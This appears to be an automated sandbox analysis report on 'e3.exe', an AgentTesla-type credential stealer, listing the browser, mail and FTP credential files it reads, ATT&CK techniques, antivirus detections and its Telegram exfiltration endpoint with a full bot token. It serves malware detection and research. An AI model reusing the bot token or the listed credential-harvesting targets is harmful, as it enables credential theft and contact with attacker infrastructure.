                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Users\user\Desktop\e3.exe VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e3.exe PID: 6384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e3.exe PID: 6540, type: MEMORYSTR
                Source: Yara matchFile source: 4.0.e3.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e3.exe.3b82640.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.e3.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e3.exe.3bb8860.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e3.exe.3b82640.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.407405620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.408635551.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.409431233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.416036513.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.410001706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e3.exe PID: 6384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e3.exe PID: 6540, type: MEMORYSTR
                Source: C:\Users\user\Desktop\e3.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\e3.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\e3.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\Desktop\e3.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Users\user\Desktop\e3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\e3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\e3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: Yara matchFile source: 00000004.00000002.639291967.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e3.exe PID: 6540, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e3.exe PID: 6384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e3.exe PID: 6540, type: MEMORYSTR
                Source: Yara matchFile source: 4.0.e3.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e3.exe.3b82640.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.e3.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.e3.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e3.exe.3bb8860.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e3.exe.3b82640.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.407405620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.408635551.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.409431233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.416036513.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.410001706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e3.exe PID: 6384, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e3.exe PID: 6540, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts311
                Windows Management Instrumentation
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Web Service
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scheduled Task/Job
                Boot or Logon Initialization Scripts1
                Scheduled Task/Job
                1
                Deobfuscate/Decode Files or Information
                11
                Input Capture
                113
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth1
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration11
                Encrypted Channel
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                Software Packing
                NTDS421
                Security Software Discovery
                Distributed Component Object Model11
                Input Capture
                Scheduled Transfer3
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets1
                Process Discovery
                SSH1
                Clipboard Data
                Data Transfer Size Limits14
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common241
                Virtualization/Sandbox Evasion
                Cached Domain Credentials241
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                Process Injection
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                System Network Configuration Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 626044 Sample: e3.exe Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 Antivirus detection for dropped file 2->35 37 13 other signatures 2->37 7 e3.exe 6 2->7         started        process3 file4 19 C:\Users\user\AppData\...\PhOyTxcSdzas.exe, PE32 7->19 dropped 21 C:\Users\user\AppData\Local\...\tmp799E.tmp, XML 7->21 dropped 23 C:\Users\user\AppData\Local\...\e3.exe.log, ASCII 7->23 dropped 39 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->39 41 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->41 43 May check the online IP address of the machine 7->43 45 3 other signatures 7->45 11 e3.exe 15 6 7->11         started        15 schtasks.exe 1 7->15         started        signatures5 process6 dnsIp7 25 api.telegram.org 149.154.167.220, 443, 49848, 49850 TELEGRAMRU United Kingdom 11->25 27 api.ipify.org.herokudns.com 52.20.78.240, 443, 49849 AMAZON-AESUS United States 11->27 29 api.ipify.org 11->29 47 Tries to steal Mail credentials (via file / registry access) 11->47 49 Tries to harvest and steal ftp login credentials 11->49 51 Tries to harvest and steal browser information (history, passwords, etc) 11->51 53 Installs a global keyboard hook 11->53 17 conhost.exe 15->17         started        signatures8 process9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                e3.exe71%VirustotalBrowse
                e3.exe73%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                e3.exe100%AviraHEUR/AGEN.1202709
                e3.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\PhOyTxcSdzas.exe100%AviraHEUR/AGEN.1202709
                C:\Users\user\AppData\Roaming\PhOyTxcSdzas.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\PhOyTxcSdzas.exe73%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                SourceDetectionScannerLabelLinkDownload
                4.0.e3.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                4.0.e3.exe.960000.11.unpack100%AviraHEUR/AGEN.1202709Download File
                4.0.e3.exe.960000.9.unpack100%AviraHEUR/AGEN.1202709Download File
                4.0.e3.exe.960000.5.unpack100%AviraHEUR/AGEN.1202709Download File
                4.0.e3.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                4.2.e3.exe.960000.1.unpack100%AviraHEUR/AGEN.1202709Download File
                4.0.e3.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                4.0.e3.exe.960000.2.unpack100%AviraHEUR/AGEN.1202709Download File
                4.0.e3.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                4.0.e3.exe.960000.0.unpack100%AviraHEUR/AGEN.1202709Download File
                0.2.e3.exe.3e0000.0.unpack100%AviraHEUR/AGEN.1202709Download File
                4.0.e3.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                4.0.e3.exe.960000.1.unpack100%AviraHEUR/AGEN.1202709Download File
                4.0.e3.exe.960000.13.unpack100%AviraHEUR/AGEN.1202709Download File
                0.0.e3.exe.3e0000.0.unpack100%AviraHEUR/AGEN.1202709Download File
                4.0.e3.exe.960000.3.unpack100%AviraHEUR/AGEN.1202709Download File
                4.2.e3.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                4.0.e3.exe.960000.7.unpack100%AviraHEUR/AGEN.1202709Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.carterandcone.com0%URL Reputationsafe
                https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                http://www.ascendercorp.com/typedesi0%Avira URL Cloudsafe
                http://www.founder.com.cn/cnhtG0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://api.telegram.orgD80%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://api.ipify.org40%URL Reputationsafe
                http://www.carterandcone.comt0%URL Reputationsafe
                http://crl.micS0%Avira URL Cloudsafe
                http://QRkfxD.com0%Avira URL Cloudsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.founder.com.cn/cn/0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.zhongyicts.com.cna0%URL Reputationsafe
                http://www.fontbureau.comm0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://8fOOnocu1ayHdFsuv.com0%Avira URL Cloudsafe
                http://www.founder.com.cn/cnht#0%Avira URL Cloudsafe
                http://www.typography.neth0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                api.ipify.org.herokudns.com
                52.20.78.240
                truefalse
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    api.ipify.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocumentfalse
                        high
                        https://api.ipify.org/false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.fontbureau.com/designersGe3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designers/?e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bThee3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.orge3.exe, 00000004.00000002.641346109.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers?e3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.tiro.come3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designerse3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.goodfont.co.kre3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.carterandcone.come3.exe, 00000000.00000003.375552900.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.375281806.00000000057D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.ipify.orgGETMozilla/5.0e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.come3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netDe3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cn/cThee3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.galapagosdesign.com/staff/dennis.htme3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.ipify.orge3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://fontfabrik.come3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://api.telegram.org4e3.exe, 00000004.00000002.641346109.00000000031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.ascendercorp.com/typedesie3.exe, 00000000.00000003.380108100.00000000057D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.founder.com.cn/cnhtGe3.exe, 00000000.00000003.374704455.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.374775375.00000000057CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleasee3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.ascendercorp.com/typedesigners.htmle3.exe, 00000000.00000003.379998185.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379759083.00000000057EE000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379911231.00000000057EE000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379665691.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379957700.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379926113.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.379837233.00000000057D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fonts.come3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.sandoll.co.kre3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.urwpp.deDPleasee3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.zhongyicts.com.cne3.exe, 00000000.00000002.417948573.00000000069B2000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000003.375200245.00000000057D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.telegram.org/bot1341301202:AAHzCj-Eu3mWY1PQc6gP-IXoYKSfMPo3X2w/sendDocumentdocument-----e3.exe, 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
